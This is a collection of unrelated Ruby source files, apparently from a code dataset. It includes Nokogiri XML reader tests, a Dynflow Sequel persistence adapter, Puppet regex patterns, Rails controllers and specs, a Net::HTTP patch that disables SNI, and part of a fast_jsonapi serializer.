reader = Nokogiri::XML::Reader.from_memory(str)
reader.read
assert_equal "<y>hello</y>", reader.inner_xml
end
def test_outer_xml
str = ["<x><y>hello</y></x>", "<y>hello</y>", "hello", "<y/>", "<x/>"]
reader = Nokogiri::XML::Reader.from_memory(str.first)
xml = []
reader.map { |node| xml << node.outer_xml }
assert_equal str, xml
end
def test_outer_xml_with_empty_nodes
str = ["<x><y/></x>", "<y/>", "<x/>"]
reader = Nokogiri::XML::Reader.from_memory(str.first)
xml = []
reader.map { |node| xml << node.outer_xml }
assert_equal str, xml
end
def test_state
reader = Nokogiri::XML::Reader.from_memory('<foo>bar</bar>')
assert reader.state
end
def test_ns_uri
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.namespace_uri
assert_equal([nil,
nil,
"http://ecommerce.example.org/schema",
nil,
"http://ecommerce.example.org/schema",
nil,
nil],
reader.map(&:namespace_uri))
end
def test_namespaced_attributes
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema' xmlns:commons="http://rets.org/xsd/RETSCommons">
<edi:foo commons:street-number="43">hello</edi:foo>
<y edi:name="francis" bacon="87"/>
</x>
eoxml
attr_ns = []
while reader.read
if reader.node_type == Nokogiri::XML::Node::ELEMENT_NODE
reader.attribute_nodes.each {|attr| attr_ns << (attr.namespace.nil? ? nil : attr.namespace.prefix) }
end
end
assert_equal(['commons',
'edi',
nil],
attr_ns)
end
def test_local_name
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.local_name
assert_equal(["x", "#text", "foo", "#text", "foo", "#text", "x"],
reader.map(&:local_name))
end
def test_name
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xmlns:edi='http://ecommerce.example.org/schema'>
<edi:foo>hello</edi:foo>
</x>
eoxml
assert_nil reader.name
assert_equal(["x", "#text", "edi:foo", "#text", "edi:foo", "#text", "x"],
reader.map(&:name))
end
def test_base_uri
reader = Nokogiri::XML::Reader.from_memory(<<-eoxml)
<x xml:base="http://base.example.org/base/">
<link href="link"/>
<other xml:base="http://other.example.org/"/>
<relative xml:base="relative">
<link href="stuff" />
</relative>
</x>
eoxml
assert_nil reader.base_uri
assert_equal(["http://base.example.org/base/",
"http://base.example.org/base/",
"http://base.example.org/base/",
"http://base.example.org/base/",
"http://other.example.org/",
"http://base.example.org/base/",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/relative",
"http://base.example.org/base/",
"http://base.example.org/base/"],
reader.map(&:base_uri))
end
def test_xlink_href_without_base_uri
reader = Nokogiri::XML::Reader(<<-eoxml)
<x xmlns:xlink="http://www.w3.org/1999/xlink">
<link xlink:href="#other">Link</link>
<other id="other">Linked Element</other>
</x>
eoxml
reader.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT
if node.name == 'link'
assert_nil node.base_uri
end
end
end
end
def test_xlink_href_with_base_uri
reader = Nokogiri::XML::Reader(<<-eoxml)
<x xml:base="http://base.example.org/base/"
xmlns:xlink="http://www.w3.org/1999/xlink">
<link xlink:href="#other">Link</link>
<other id="other">Linked Element</other>
</x>
eoxml
reader.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT
assert_equal node.base_uri, "http://base.example.org/base/"
end
end
end
def test_read_from_memory
called = false
reader = Nokogiri::XML::Reader.from_memory('<foo>bar</foo>')
reader.each do |node|
called = true
assert node
end
assert called
end
def test_large_document_smoke_test
# simply run on a large document to verify that there no GC issues
xml = []
xml << "<elements>"
10000.times { |j| xml << "<element id=\"#{j}\"/>" }
xml << "</elements>"
xml = xml.join("\n")
Nokogiri::XML::Reader.from_memory(xml).each do |e|
e.attributes
end
end
def test_correct_outer_xml_inclusion
xml = Nokogiri::XML::Reader.from_io(StringIO.new(<<-eoxml))
<root-element>
<children>
<child n="1">
<field>child-1</field>
</child>
<child n="2">
<field>child-2</field>
</child>
<child n="3">
<field>child-3</field>
</child>
</children>
</root-element>
eoxml
nodelengths = []
has_child2 = []
xml.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT and node.name == "child"
nodelengths << node.outer_xml.length
has_child2 << !!(node.outer_xml =~ /child-2/)
end
end
assert_equal(nodelengths[0], nodelengths[1])
assert(has_child2[1])
assert(!has_child2[0])
end
def test_correct_inner_xml_inclusion
xml = Nokogiri::XML::Reader.from_io(StringIO.new(<<-eoxml))
<root-element>
<children>
<child n="1">
<field>child-1</field>
</child>
<child n="2">
<field>child-2</field>
</child>
<child n="3">
<field>child-3</field>
</child>
</children>
</root-element>
eoxml
nodelengths = []
has_child2 = []
xml.each do |node|
if node.node_type == Nokogiri::XML::Reader::TYPE_ELEMENT and node.name == "child"
nodelengths << node.inner_xml.length
has_child2 << !!(node.inner_xml =~ /child-2/)
end
end
assert_equal(nodelengths[0], nodelengths[1])
assert(has_child2[1])
assert(!has_child2[0])
end
def test_nonexistent_attribute
require 'nokogiri'
reader = Nokogiri::XML::Reader("<root xmlns='bob'><el attr='fred' /></root>")
reader.read # root
reader.read # el
assert_equal nil, reader.attribute('other')
end
end
end
end
| 33.108374 | 118 | 0.528195 |
e29d4e2c993a6236defb63dc2f96f609a633720f | 151 | class Card < ActiveRecord::Base
has_many :guesses
belongs_to :deck
validates :question, presence: true
validates :answer, presence: true
end
| 16.777778 | 37 | 0.748344 |
18c60555071a82bd59d2468e47ae2b0523eb83d2 | 16,629 | # frozen_string_literal: true
require 'sequel'
require 'multi_json'
require 'fileutils'
require 'csv'
module Dynflow
module PersistenceAdapters
Sequel.extension :migration
Sequel.database_timezone = :utc
class Sequel < Abstract
include Algebrick::TypeCheck
include Algebrick::Matching
MAX_RETRIES = 10
RETRY_DELAY = 1
attr_reader :db
def pagination?
true
end
def filtering_by
META_DATA.fetch :execution_plan
end
def ordering_by
META_DATA.fetch :execution_plan
end
META_DATA = { execution_plan: %w(label state result started_at ended_at real_time execution_time root_plan_step_id class),
action: %w(caller_execution_plan_id caller_action_id class plan_step_id run_step_id finalize_step_id),
step: %w(state started_at ended_at real_time execution_time action_id progress_done progress_weight
class action_class execution_plan_uuid queue),
envelope: %w(receiver_id),
coordinator_record: %w(id owner_id class),
delayed: %w(execution_plan_uuid start_at start_before args_serializer frozen)}
SERIALIZABLE_COLUMNS = { action: %w(input output),
delayed: %w(serialized_args),
execution_plan: %w(run_flow finalize_flow execution_history step_ids),
step: %w(error children) }
def initialize(config)
migrate = true
config = config.dup
@additional_responsibilities = { coordinator: true, connector: true }
if config.is_a?(Hash)
@additional_responsibilities.merge!(config.delete(:additional_responsibilities)) if config.key?(:additional_responsibilities)
migrate = config.fetch(:migrate, true)
end
@db = initialize_db config
migrate_db if migrate
end
def transaction(&block)
db.transaction(&block)
end
def find_execution_plans(options = {})
table_name = :execution_plan
options[:order_by] ||= :started_at
data_set = filter(table_name,
order(table_name,
paginate(table(table_name), options),
options),
options[:filters])
data_set.all.map { |record| execution_plan_column_map(load_data(record, table_name)) }
end
def find_execution_plan_counts(options = {})
filter(:execution_plan, table(:execution_plan), options[:filters]).count
end
def delete_execution_plans(filters, batch_size = 1000, backup_dir = nil)
count = 0
filter(:execution_plan, table(:execution_plan), filters).each_slice(batch_size) do |plans|
uuids = plans.map { |p| p.fetch(:uuid) }
@db.transaction do
table(:delayed).where(execution_plan_uuid: uuids).delete
steps = table(:step).where(execution_plan_uuid: uuids)
backup_to_csv(steps, backup_dir, 'steps.csv') if backup_dir
steps.delete
actions = table(:action).where(execution_plan_uuid: uuids)
backup_to_csv(actions, backup_dir, 'actions.csv') if backup_dir
actions.delete
execution_plans = table(:execution_plan).where(uuid: uuids)
backup_to_csv(execution_plans, backup_dir, 'execution_plans.csv') if backup_dir
count += execution_plans.delete
end
end
return count
end
def load_execution_plan(execution_plan_id)
execution_plan_column_map(load :execution_plan, uuid: execution_plan_id)
end
def save_execution_plan(execution_plan_id, value)
save :execution_plan, { uuid: execution_plan_id }, value, with_data: false
end
def delete_delayed_plans(filters, batch_size = 1000)
count = 0
filter(:delayed, table(:delayed), filters).each_slice(batch_size) do |plans|
uuids = plans.map { |p| p.fetch(:execution_plan_uuid) }
@db.transaction do
count += table(:delayed).where(execution_plan_uuid: uuids).delete
end
end
count
end
def find_old_execution_plans(age)
table_name = :execution_plan
table(table_name)
.where(::Sequel.lit('ended_at <= ? AND state = ?', age, 'stopped'))
.all.map { |plan| execution_plan_column_map(load_data plan, table_name) }
end
def find_past_delayed_plans(time)
table_name = :delayed
table(table_name)
.where(::Sequel.lit('start_at <= ? OR (start_before IS NOT NULL AND start_before <= ?)', time, time))
.where(:frozen => false)
.order_by(:start_at)
.all
.map { |plan| load_data(plan, table_name) }
end
def load_delayed_plan(execution_plan_id)
load :delayed, execution_plan_uuid: execution_plan_id
rescue KeyError
return nil
end
def save_delayed_plan(execution_plan_id, value)
save :delayed, { execution_plan_uuid: execution_plan_id }, value, with_data: false
end
def load_step(execution_plan_id, step_id)
load :step, execution_plan_uuid: execution_plan_id, id: step_id
end
def load_steps(execution_plan_id)
load_records :step, execution_plan_uuid: execution_plan_id
end
def save_step(execution_plan_id, step_id, value, update_conditions = {})
save :step, { execution_plan_uuid: execution_plan_id, id: step_id }, value,
with_data: false, update_conditions: update_conditions
end
def load_action(execution_plan_id, action_id)
load :action, execution_plan_uuid: execution_plan_id, id: action_id
end
def load_actions(execution_plan_id, action_ids)
load_records :action, { execution_plan_uuid: execution_plan_id, id: action_ids }
end
def load_actions_attributes(execution_plan_id, attributes)
load_records :action, { execution_plan_uuid: execution_plan_id }, attributes
end
def save_action(execution_plan_id, action_id, value)
save :action, { execution_plan_uuid: execution_plan_id, id: action_id }, value, with_data: false
end
def connector_feature!
unless @additional_responsibilities[:connector]
raise "The sequel persistence adapter connector feature used but not enabled in additional_features"
end
end
def save_envelope(data)
connector_feature!
save :envelope, {}, data
end
def pull_envelopes(receiver_id)
connector_feature!
db.transaction do
data_set = table(:envelope).where(receiver_id: receiver_id).all
envelopes = data_set.map { |record| load_data(record) }
table(:envelope).where(id: data_set.map { |d| d[:id] }).delete
return envelopes
end
end
def push_envelope(envelope)
connector_feature!
table(:envelope).insert(prepare_record(:envelope, envelope))
end
def prune_envelopes(receiver_ids)
connector_feature!
table(:envelope).where(receiver_id: receiver_ids).delete
end
def prune_undeliverable_envelopes
connector_feature!
table(:envelope).where(receiver_id: table(:coordinator_record).select(:id)).invert.delete
end
def coordinator_feature!
unless @additional_responsibilities[:coordinator]
raise "The sequel persistence adapter coordinator feature used but not enabled in additional_features"
end
end
def insert_coordinator_record(value)
coordinator_feature!
save :coordinator_record, {}, value
end
def update_coordinator_record(class_name, record_id, value)
coordinator_feature!
save :coordinator_record, {class: class_name, :id => record_id}, value
end
def delete_coordinator_record(class_name, record_id)
coordinator_feature!
table(:coordinator_record).where(class: class_name, id: record_id).delete
end
def find_coordinator_records(options)
coordinator_feature!
options = options.dup
filters = (options[:filters] || {}).dup
exclude_owner_id = filters.delete(:exclude_owner_id)
data_set = filter(:coordinator_record, table(:coordinator_record), filters)
if exclude_owner_id
data_set = data_set.exclude(:owner_id => exclude_owner_id)
end
data_set.all.map { |record| load_data(record) }
end
def to_hash
{ execution_plans: table(:execution_plan).all.to_a,
steps: table(:step).all.to_a,
actions: table(:action).all.to_a,
envelopes: table(:envelope).all.to_a }
end
def migrate_db
::Sequel::Migrator.run(db, self.class.migrations_path, table: 'dynflow_schema_info')
end
def abort_if_pending_migrations!
::Sequel::Migrator.check_current(db, self.class.migrations_path, table: 'dynflow_schema_info')
end
private
TABLES = { execution_plan: :dynflow_execution_plans,
action: :dynflow_actions,
step: :dynflow_steps,
envelope: :dynflow_envelopes,
coordinator_record: :dynflow_coordinator_records,
delayed: :dynflow_delayed_plans }
def table(which)
db[TABLES.fetch(which)]
end
def initialize_db(db_path)
::Sequel.connect db_path
end
def self.migrations_path
File.expand_path('../sequel_migrations', __FILE__)
end
def prepare_record(table_name, value, base = {}, with_data = true)
record = base.dup
if with_data && table(table_name).columns.include?(:data)
record[:data] = dump_data(value)
else
record[:data] = nil
record.merge! serialize_columns(table_name, value)
end
record.merge! extract_metadata(table_name, value)
record.each { |k, v| record[k] = v.to_s if v.is_a? Symbol }
record
end
def serialize_columns(table_name, record)
record.reduce({}) do |acc, (key, value)|
if SERIALIZABLE_COLUMNS.fetch(table_name, []).include?(key.to_s)
acc.merge(key.to_sym => dump_data(value))
else
acc
end
end
end
def save(what, condition, value, with_data: true, update_conditions: {})
table = table(what)
existing_record = with_retry { table.first condition } unless condition.empty?
if value
record = prepare_record(what, value, (existing_record || condition), with_data)
if existing_record
condition = update_conditions.merge(condition)
return with_retry { table.where(condition).update(record) }
else
with_retry { table.insert record }
end
else
existing_record and with_retry { table.where(condition).delete }
end
value
end
def load_record(what, condition)
table = table(what)
if (record = with_retry { table.first(Utils.symbolize_keys(condition)) } )
load_data(record, what)
else
raise KeyError, "searching: #{what} by: #{condition.inspect}"
end
end
alias_method :load, :load_record
def load_records(what, condition, keys = nil)
table = table(what)
records = with_retry do
filtered = table.filter(Utils.symbolize_keys(condition))
# Filter out requested columns which the table doesn't have, load data just in case
filtered = filtered.select(:data, *(table.columns & keys)) unless keys.nil?
filtered.all
end
records = records.map { |record| load_data(record, what) }
return records if keys.nil?
records.map do |record|
keys.reduce({}) do |acc, key|
acc.merge(key => record[key])
end
end
end
def load_data(record, what = nil)
hash = if record[:data].nil?
SERIALIZABLE_COLUMNS.fetch(what, []).each do |key|
key = key.to_sym
record[key] = MultiJson.load(record[key]) unless record[key].nil?
end
record
else
MultiJson.load(record[:data])
end
Utils.indifferent_hash(hash)
end
def ensure_backup_dir(backup_dir)
FileUtils.mkdir_p(backup_dir) unless File.directory?(backup_dir)
end
def backup_to_csv(dataset, backup_dir, file_name)
ensure_backup_dir(backup_dir)
csv_file = File.join(backup_dir, file_name)
appending = File.exist?(csv_file)
columns = dataset.columns
File.open(csv_file, 'a') do |csv|
csv << columns.to_csv unless appending
dataset.each do |row|
csv << columns.collect { |col| row[col] }.to_csv
end
end
dataset
end
def delete(what, condition)
table(what).where(Utils.symbolize_keys(condition)).delete
end
def extract_metadata(what, value)
meta_keys = META_DATA.fetch(what) - SERIALIZABLE_COLUMNS.fetch(what, [])
value = Utils.indifferent_hash(value)
meta_keys.inject({}) { |h, k| h.update k.to_sym => value[k] }
end
def dump_data(value)
return if value.nil?
MultiJson.dump Type!(value, Hash, Array, Integer)
end
def paginate(data_set, options)
page = Integer(options[:page]) if options[:page]
per_page = Integer(options[:per_page]) if options[:per_page]
if page
raise ArgumentError, "page specified without per_page attribute" unless per_page
data_set.limit per_page, per_page * page
else
data_set
end
end
def order(what, data_set, options)
order_by = (options[:order_by]).to_s
return data_set if order_by.empty?
unless META_DATA.fetch(what).include? order_by
raise ArgumentError, "unknown column #{order_by.inspect}"
end
order_by = order_by.to_sym
data_set.order_by options[:desc] ? ::Sequel.desc(order_by) : order_by
end
def filter(what, data_set, filters)
Type! filters, NilClass, Hash
return data_set if filters.nil?
filters = filters.each.with_object({}) { |(k, v), hash| hash[k.to_s] = v }
unknown = filters.keys - META_DATA.fetch(what)
if what == :execution_plan
unknown -= %w[uuid caller_execution_plan_id caller_action_id delayed]
if filters.key?('caller_action_id') && !filters.key?('caller_execution_plan_id')
raise ArgumentError, "caller_action_id given but caller_execution_plan_id missing"
end
if filters.key?('caller_execution_plan_id')
data_set = data_set.join_table(:inner, TABLES[:action], :execution_plan_uuid => :uuid).
select_all(TABLES[:execution_plan]).distinct
end
if filters.key?('delayed')
filters.delete('delayed')
data_set = data_set.join_table(:inner, TABLES[:delayed], :execution_plan_uuid => :uuid).
select_all(TABLES[:execution_plan]).distinct
end
end
unless unknown.empty?
raise ArgumentError, "unkown columns: #{unknown.inspect}"
end
data_set.where Utils.symbolize_keys(filters)
end
def with_retry
attempts = 0
begin
yield
rescue ::Sequel::DatabaseConnectionError, ::Sequel::DatabaseDisconnectError => e
attempts += 1
log(:error, e)
if attempts > MAX_RETRIES
log(:error, "The number of MAX_RETRIES exceeded")
raise Errors::FatalPersistenceError.delegate(e)
else
log(:error, "Persistence retry no. #{attempts}")
sleep RETRY_DELAY
retry
end
rescue Exception => e
raise Errors::PersistenceError.delegate(e)
end
end
def execution_plan_column_map(plan)
plan[:id] = plan[:uuid] unless plan[:uuid].nil?
plan
end
end
end
end
| 34.64375 | 135 | 0.615732 |
ff174c6c6bb72c420ba9b218506719bcfa2f3ef0 | 2,097 | # The Patterns module contains common regular expression patters for the Puppet DSL language
module Puppet::Pops::Patterns
# NUMERIC matches hex, octal, decimal, and floating point and captures several parts
# 0 = entire matched number, leading and trailing whitespace and sign included
# 1 = sign, +, - or nothing
# 2 = entire numeric part
# 3 = hexadecimal number
# 4 = non hex integer portion, possibly with leading 0 (octal)
# 5 = floating point part, starts with ".", decimals and optional exponent
#
# Thus, a hex number has group 3 value, an octal value has group 4 (if it starts with 0), and no group 3
# and a floating point value has group 4 and group 5.
#
NUMERIC = %r{\A[[:blank:]]*([-+]?)[[:blank:]]*((0[xX][0-9A-Fa-f]+)|(0?\d+)((?:\.\d+)?(?:[eE]-?\d+)?))[[:blank:]]*\z}
# ILLEGAL_P3_1_HOSTNAME matches if a hostname contains illegal characters.
# This check does not prevent pathological names like 'a....b', '.....', "---". etc.
ILLEGAL_HOSTNAME_CHARS = %r{[^-\w.]}
# NAME matches a name the same way as the lexer.
NAME = %r{\A((::)?[a-z]\w*)(::[a-z]\w*)*\z}
# CLASSREF_EXT matches a class reference the same way as the lexer - i.e. the external source form
# where each part must start with a capital letter A-Z.
# This name includes hyphen, which may be illegal in some cases.
#
CLASSREF_EXT = %r{\A((::){0,1}[A-Z][\w]*)+\z}
# CLASSREF matches a class reference the way it is represented internally in the
# model (i.e. in lower case).
# This name includes hyphen, which may be illegal in some cases.
#
CLASSREF = %r{\A((::){0,1}[a-z][\w]*)+\z}
# DOLLAR_VAR matches a variable name including the initial $ character
DOLLAR_VAR = %r{\$(::)?(\w+::)*\w+}
# VAR_NAME matches the name part of a variable (The $ character is not included)
# Note, that only the final segment may start with an underscore.
VAR_NAME = %r{\A(:?(::)?[a-z]\w*)*(:?(::)?[a-z_]\w*)\z}
# A Numeric var name must be the decimal number 0, or a decimal number not starting with 0
NUMERIC_VAR_NAME = %r{\A(?:0|(?:[1-9][0-9]*))\z}
end
| 44.617021 | 118 | 0.649976 |
1137c8036b2a8379665e04546f3d064ba39f77ef | 1,663 | class ApplicationController < ActionController::Base
http_basic_authenticate_with name: ENV['BASIC_AUTH_NAME'],
password: ENV['BASIC_AUTH_PASSWORD'] if Rails.env.staging?
before_action :store_location , unless: :login_page_access?
# Prevent CSRF attacks by raising an exception.
# For APIs, you may want to use :null_session instead.
protect_from_forgery with: :exception
include SessionsHelper
before_action :set_request_variant
# NOTE: rescue_from methods are evaluated from **bottom to up**
if Rails.env.production?
rescue_from Exception, with: :render_500
rescue_from ActiveRecord::RecordNotFound, with: :render_404
rescue_from ActionController::RoutingError, with: :render_404
rescue_from Scrivito::ResourceNotFound, with: :render_404
end
private
def store_location
session[:original_url] = request.original_url
end
def login_page_access?
%w(login_page sessions).include? self.controller_name
end
def set_request_variant
request.variant = request.device_variant
end
def render_403(e)
render template: 'errors/403', status: 403,
layout: 'application',
content_type: 'text/html'
end
def render_404(e)
render template: 'errors/404', status: 404,
layout: 'application',
content_type: 'text/html'
end
def render_500(e)
render template: 'errors/500', status: 500,
layout: 'application',
content_type: 'text/html'
end
end
| 30.796296 | 85 | 0.643416 |
184ed5129097074ced63093d4725b8d274ebe9f7 | 2,282 | # frozen_string_literal: true
module Mutant
class Reporter
class CLI
class Printer
# Env progress printer
class EnvProgress < self
delegate(
:coverage,
:amount_subjects,
:amount_mutations,
:amount_mutations_alive,
:amount_mutations_killed,
:amount_mutation_results,
:runtime,
:killtime,
:overhead,
:env
)
FORMATS = IceNine.deep_freeze([
[:info, 'Subjects: %s', :amount_subjects ],
[:info, 'Mutations: %s', :amount_mutations ],
[:info, 'Results: %s', :amount_mutation_results ],
[:info, 'Kills: %s', :amount_mutations_killed ],
[:info, 'Alive: %s', :amount_mutations_alive ],
[:info, 'Runtime: %0.2fs', :runtime ],
[:info, 'Killtime: %0.2fs', :killtime ],
[:info, 'Overhead: %0.2f%%', :overhead_percent ],
[:info, 'Mutations/s: %0.2f', :mutations_per_second ],
[:status, 'Coverage: %0.2f%%', :coverage_percent ]
])
# Run printer
#
# @return [undefined]
def run
visit(Config, env.config)
FORMATS.each do |report, format, value|
__send__(report, format, __send__(value))
end
end
private
# Mutations processed per second
#
# @return [Float]
#
# @api private
def mutations_per_second
amount_mutation_results / runtime
end
# Coverage in percent
#
# @return [Float]
#
# @api private
def coverage_percent
coverage * 100
end
# Overhead in percent
#
# @return [Float]
#
# @api private
def overhead_percent
(overhead / killtime) * 100
end
end # EnvProgress
end # Printer
end # CLI
end # Reporter
end # Mutant
| 29.25641 | 78 | 0.442594 |
7a30bae2225eb5ba41030dec8fb83b6b1a5c4543 | 899 | # frozen_string_literal: true
require "rails"
require "react_on_rails/error"
require "react_on_rails/prerender_error"
require "react_on_rails/json_parse_error"
require "react_on_rails/helper"
require "react_on_rails/controller"
require "react_on_rails/version"
require "react_on_rails/version_checker"
require "react_on_rails/configuration"
require "react_on_rails/server_rendering_pool"
require "react_on_rails/engine"
require "react_on_rails/react_component/render_options"
require "react_on_rails/version_syntax_converter"
require "react_on_rails/test_helper"
require "react_on_rails/git_utils"
require "react_on_rails/utils"
require "react_on_rails/webpacker_utils"
require "react_on_rails/test_helper/webpack_assets_compiler"
require "react_on_rails/test_helper/webpack_assets_status_checker"
require "react_on_rails/test_helper/ensure_assets_compiled"
require "react_on_rails/locales_to_js"
| 35.96 | 66 | 0.87208 |
4a5d9acf6760655ddb41d113f6c5852f28229626 | 2,848 | require "spec_helper"
# unset models used for testing purposes
Object.unset_class('User')
class Notify::Senders::Mail < Notify::Base
def deliver
$notifications << 'mail'
$options = @options
end
end
class Notify::Senders::Jabber < Notify::Base
def deliver
$notifications << 'jabber'
$options = @options
end
end
class Notify::Senders::Inbox < Notify::Base
def deliver
$notifications << 'inbox'
$options = @options
end
end
class User < ActiveRecord::Base
has_many :notifications, :dependent => :destroy
end
describe "has_notifications" do
before(:each) do
$notifications = []
$options = nil
@user = User.create(:login => 'johndoe')
end
it "should create notification" do
doing {
create_notification
}.should_not raise_error
end
it "should serialize senders" do
notification = create_notification
notification.senders.should == %w(inbox mail jabber)
end
it "should send to mail only" do
notification = create_notification(:senders => %w(mail))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == %w(mail)
end
it "should send to mail and jabber" do
notification = create_notification(:senders => %w(mail jabber))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == %w(mail jabber)
end
it "should not send at all" do
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should be_empty
end
it "should set options" do
create_notification(:senders => %w(jabber))
Notify.deliver(:name => 'friendship_invitation', :user => @user, :some_data => 'some_data')
$options.should == {:user => @user, :name => 'friendship_invitation', :some_data => 'some_data'}
end
it "should raise if user is not set" do
doing {
Notify.deliver(:name => 'friendship_invitation')
}.should raise_error(ArgumentError)
end
it "should raise if name is not set" do
doing {
Notify.deliver(:user => @user)
}.should raise_error(ArgumentError)
end
it "should not invoke invalid name" do
Notify.deliver(:name => 'invalid', :user => @user)
end
it "should not invoke invalid senders" do
create_notification(:senders => %w(invalid))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == []
end
it "should invoke only valid senders" do
create_notification(:senders => %w(invalid mail))
Notify.deliver(:name => 'friendship_invitation', :user => @user)
$notifications.should == %w(mail)
end
private
def create_notification(options={})
@user.notifications.create!({
:name => 'friendship_invitation',
:senders => %w(inbox mail jabber)
}.merge(options))
end
end | 26.616822 | 100 | 0.662921 |
793e345f9d641cfe27d12306a5e354b7bd306dfd | 3,433 | # We have to monkey patch the Net::HTTP:connect method in order to disable SNI because it does not
# work with the Habitat Supervisor HTTP Gateway.
#
# This is accomplished by commenting out this line:
# s.hostname = @address if s.respond_to? :hostname=
# https://bugs.ruby-lang.org/attachments/4940
#
module Net
class HTTP
alias_method :old_connect, :connect
def connect
if proxy? then
conn_address = proxy_address
conn_port = proxy_port
else
conn_address = address
conn_port = port
end
D "opening connection to #{conn_address}:#{conn_port}..."
s = Timeout.timeout(@open_timeout, Net::OpenTimeout) {
begin
TCPSocket.open(conn_address, conn_port, @local_host, @local_port)
rescue => e
raise e, "Failed to open TCP connection to " +
"#{conn_address}:#{conn_port} (#{e.message})"
end
}
s.setsockopt(Socket::IPPROTO_TCP, Socket::TCP_NODELAY, 1)
D "opened"
if use_ssl?
if proxy?
plain_sock = BufferedIO.new(s, read_timeout: @read_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
buf = "CONNECT #{@address}:#{@port} HTTP/#{HTTPVersion}\r\n"
buf << "Host: #{@address}:#{@port}\r\n"
if proxy_user
credential = ["#{proxy_user}:#{proxy_pass}"].pack('m0')
buf << "Proxy-Authorization: Basic #{credential}\r\n"
end
buf << "\r\n"
plain_sock.write(buf)
HTTPResponse.read_new(plain_sock).value
# assuming nothing left in buffers after successful CONNECT response
end
ssl_parameters = Hash.new
iv_list = instance_variables
SSL_IVNAMES.each_with_index do |ivname, i|
if iv_list.include?(ivname) and
value = instance_variable_get(ivname)
ssl_parameters[SSL_ATTRIBUTES[i]] = value if value
end
end
@ssl_context = OpenSSL::SSL::SSLContext.new
@ssl_context.set_params(ssl_parameters)
@ssl_context.session_cache_mode =
OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT |
OpenSSL::SSL::SSLContext::SESSION_CACHE_NO_INTERNAL_STORE
@ssl_context.session_new_cb = proc {|sock, sess| @ssl_session = sess }
D "starting SSL for #{conn_address}:#{conn_port}..."
s = OpenSSL::SSL::SSLSocket.new(s, @ssl_context)
s.sync_close = true
# Server Name Indication (SNI) RFC 3546
# HERE WE ARE DISABLING SNI!
# s.hostname = @address if s.respond_to? :hostname=
if @ssl_session and
Process.clock_gettime(Process::CLOCK_REALTIME) < @ssl_session.time.to_f + @ssl_session.timeout
s.session = @ssl_session
end
ssl_socket_connect(s, @open_timeout)
if @ssl_context.verify_mode != OpenSSL::SSL::VERIFY_PEER
s.post_connection_check(@address)
end
D "SSL established"
end
@socket = BufferedIO.new(s, read_timeout: @read_timeout,
continue_timeout: @continue_timeout,
debug_output: @debug_output)
on_connect
rescue => exception
if s
D "Conn close because of connect error #{exception}"
s.close
end
raise
end
end
end
| 37.315217 | 105 | 0.601806 |
4aa899354fed6cafd7cb0d288c577daeed38b377 | 438 | # frozen_string_literal: true
class AnswerForCorrectTemplateValidator < ActiveModel::Validator
def validate(record)
return if record.plan.nil? || record.question.nil?
# Make sure that the question and plan belong to the same template!
return unless record.plan.template == record.question.section.phase.template
record.errors[:question] << I18n.t("helpers.answer.question_must_belong_to_correct_template")
end
end
| 31.285714 | 97 | 0.773973 |
abf1415027a0df96ca9d551f7bb1cf61a54efb90 | 7,655 | # frozen_string_literal: true
require 'active_support/concern'
require 'fast_jsonapi/multi_to_json'
module FastJsonapi
MandatoryField = Class.new(StandardError)
module SerializationCore
extend ActiveSupport::Concern
included do
class << self
attr_accessor :attributes_to_serialize,
:relationships_to_serialize,
:cachable_relationships_to_serialize,
:uncachable_relationships_to_serialize,
:transform_method,
:record_type,
:record_id,
:cache_length,
:race_condition_ttl,
:cached,
:data_links
end
end
class_methods do
def id_hash(id, record_type, default_return=false)
if id.present?
{ id: id.to_s, type: record_type }
else
default_return ? { id: nil, type: record_type } : nil
end
end
def ids_hash(ids, record_type)
return ids.map { |id| id_hash(id, record_type) } if ids.respond_to? :map
id_hash(ids, record_type) # ids variable is just a single id here
end
def id_hash_from_record(record, record_types)
# memoize the record type within the record_types dictionary, then assigning to record_type:
record_type = record_types[record.class] ||= record.class.name.underscore.to_sym
id_hash(record.id, record_type)
end
def ids_hash_from_record_and_relationship(record, relationship, params = {})
polymorphic = relationship[:polymorphic]
return ids_hash(
fetch_id(record, relationship, params),
relationship[:record_type]
) unless polymorphic
return unless associated_object = fetch_associated_object(record, relationship, params)
return associated_object.map do |object|
id_hash_from_record object, polymorphic
end if associated_object.respond_to? :map
id_hash_from_record associated_object, polymorphic
end
def links_hash(record, params = {})
data_links.each_with_object({}) do |(key, method), link_hash|
link_hash[key] = if method.is_a?(Proc)
method.arity == 1 ? method.call(record) : method.call(record, params)
else
record.public_send(method)
end
end
end
def attributes_hash(record, params = {})
attributes_to_serialize.each_with_object({}) do |(key, method), attr_hash|
attr_hash[key] = if method.is_a?(Proc)
method.arity == 1 ? method.call(record) : method.call(record, params)
else
record.public_send(method)
end
end
end
def relationships_hash(record, relationships = nil, params = {})
relationships = relationships_to_serialize if relationships.nil?
relationships.each_with_object({}) do |(_k, relationship), hash|
name = relationship[:key]
empty_case = relationship[:relationship_type] == :has_many ? [] : nil
hash[name] = {
data: ids_hash_from_record_and_relationship(record, relationship, params) || empty_case
}
end
end
def record_hash(record, params = {})
if cached
record_hash = Rails.cache.fetch(record.cache_key, expires_in: cache_length, race_condition_ttl: race_condition_ttl) do
temp_hash = id_hash(id_from_record(record), record_type, true)
temp_hash[:attributes] = attributes_hash(record, params) if attributes_to_serialize.present?
temp_hash[:relationships] = {}
